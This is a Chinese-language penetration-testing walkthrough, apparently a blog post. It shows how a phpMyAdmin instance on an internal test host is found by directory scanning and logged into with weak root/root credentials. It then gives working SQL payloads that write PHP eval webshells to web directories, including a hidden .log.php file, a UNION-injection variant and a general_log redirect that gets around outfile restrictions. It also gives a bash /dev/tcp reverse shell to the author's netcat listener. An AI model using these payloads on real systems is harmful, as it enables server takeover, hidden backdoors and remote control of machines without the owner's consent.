公司测试地址：10.0.3.45

测试地址是内网，外网访问不了

这里暴力破解指目录暴破，对于phpMyAdmin来说，因为是弱口令这里就没有暴破，需要的话可以利用burp进行暴力破解

还有一款专门用于phpMyAdmin的破解工具，不做演示了

工具链接

链接:https://pan.baidu.com/s/1Bcdt4sMR1KDRNzj_-bG4-g  密码:rq83

今天是暴力破解+目录遍历

用到的工具：nmap 御剑 菜刀

首先用nmap扫描，发现开放端口

看到3306端口开启，

思路1：爆破3306的root密码 或者ssh密码，有了3306的密码登录，用into outfile导出一句话到web目录下

思路2：目录遍历读写配置文件，登录mysql，导出webshell

这里我用的是思路2

用御剑扫描目标网站

第一个url访问没什么用，访问第二个URL

将data.zip下载下来，解压，发现robots.txt，打开

访问此地址

发现phpMyAdmin，点进去

用户名密码是弱口令root/root

登录进去，写入webshell

select '<?php @eval($_POST[1])?>' into outfile '/var/www/html/.log.php'

并执行

文件名前面加点是隐藏文件，使用ls命令看不到，只有使用ls -a 才能看到

执行成功，连接菜刀

菜刀地址写：10.0.3.45/.log.php 密码为1

成功。

分享一些sql写马的语句

select '<?php @eval($_POST[1])?>' into outfile '/data/www/heneng/cp/log.php'

select '<?php @eval($_POST[1])?>' into outfile 'D:/phpStudy/WWW/22.php'

' and 1=2 union all select '<?php @eval($_POST[1])?>',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 into outfile 'f:/desktop/22.php'#'

select count(*) as doyo_total_page from dy_message where isshow=1 and tid=23

phpmyadmin 导出一句话（安全策略）

set global general_log='on';

SET global general_log_file='D:/phpStudy/WWW/cmd.php';

SELECT '<?php assert($_POST["cmd"]);?>';

这些的区别 我不太清楚 同事是这么说的

前三种是同一个方法啊

第四个不是 是个注入语句

最后一种是mysql自身的 在存在安全策略的时候不能用outfile或者dumpfile函数写文件的时候 利用mysql 自身的log文件重定向方法写入webshell但是webshell会随着访问数量大变的很大 传完拿下换个shell就好

最后一种不一定要在 phpmyadmin 里

在菜刀中执行不方便可以利用nc反弹shell

在自己的服务端使用nc（kail自带，可以直接执行）

输入命令：nc -lvvp 45678   (45678是可以自己定义的端口，不冲突就好，-l是监听，-vv是得到更详细的内容，-p是指定端口)

连接上菜刀后在被攻击方的服务器上使用命令

bash -i >& /dev/tcp/10.0.3.62/45678 0>&1   （10.0.3.62是我自己执行上一条nc命令的服务器地址，45678是端口号，与上一条相同）

执行后会反弹shell